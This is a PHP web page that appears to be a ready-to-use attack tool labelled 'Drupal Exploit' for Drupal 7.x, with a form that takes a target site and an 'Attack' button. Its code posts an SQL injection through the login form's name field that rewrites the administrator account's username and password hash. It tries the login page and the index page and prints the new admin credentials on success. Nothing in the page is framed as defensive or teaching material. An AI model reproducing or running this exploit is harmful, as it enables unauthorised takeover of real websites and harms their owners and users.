#drupalexploit

1. <!Doctype HTML>
2. <html>
3. <head>
4. <link rel="shortcut icon" href="http://shopget24.com/images/sampledata/hack-run.png">
5.     <title>Drupal Exploit</title>
6.     <style type="text/css">
7.     .mymargin{
8.         margin-top:30px;
9.         color:white;
10.         font-family: monospace;
11.     }
12.     body{
13.         background-color:#999;
14.     }
15.     a {
16.     color: red;
17.     text-decoration: none;
18. }
19.     h1 {
20.     color: #40E1C9
21.     }
22.     h2 {
23.     color : #008000;
24.     }
25.     </style>
26. </head>
27. <body>
28. <center>
29.     <img src="http://shopget24.com/images/sampledata/hack-run.png" width="150" height="160">
30.     <div class="mymargin">
31.         <center>
32.             <h1>Drupal Exploit</h1>
33.             <h2>Version 7.x</h2>
34.     <form method="GET" action="">
35.         Site : <input type="text" name="url" placeholder="Example: www.site.com">
36.         <input size="50" type="submit" name="submit" value="Attack">
37.     </form>
38.     <br>
39. <?php
40.  
41. error_reporting(0);
42. if(isset($_GET['submit'])){
43.     $log = "/user/login";
44.     $url = "http://".$_GET['url'];
45.     $holako = "/?q=user";
46.     $post_data = "name[0;update users set name %3D 'HolaKo' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
47.     $params = array(
48.         'http' => array(
49.         'method' => 'POST',
50.         'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
51.         'content' => $post_data
52.         )
53.     );
54.     $ctx = stream_context_create($params);
55.     $data = file_get_contents($url . '/user/login/', null, $ctx);
56.     echo "<h3>Testing user/login </h3>";
57.     if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) {
58.         echo "<h1>Success</h1><br><h3>User : HolaKo<br>Password : admin<br><h3><a href='{$url}{$log}'>Click here</a>";
59.     } else {
60.         echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
61.     }
62. }
63.  
64. if(isset($_GET['submit'])){
65.  
66.     $url = "http://".$_GET['url']."/";
67.     $post_data = "name[0;update users set name %3D 'HolaKo' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
68.     $params = array(
69.         'http' => array(
70.         'method' => 'POST',
71.         'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
72.         'content' => $post_data
73.         )
74.     );
75.     $ctx = stream_context_create($params);
76.     $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
77.     echo '<h3>Testing at Index</h3>';
78.     if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
79.         echo "<h1>Success</h1><br><h3>User : HolaKo<br>Password : admin<br><h3><a href='{$url}{$holako}'>Click here</a>";
80.     } else {
81.         echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
82.     }
83. }
84.  
85. ?>
86.     <h3>Developed By <a href="http://fb.com/black4sniperr">black sniper</h3>
87.     </div>
88. </body>
89. </html>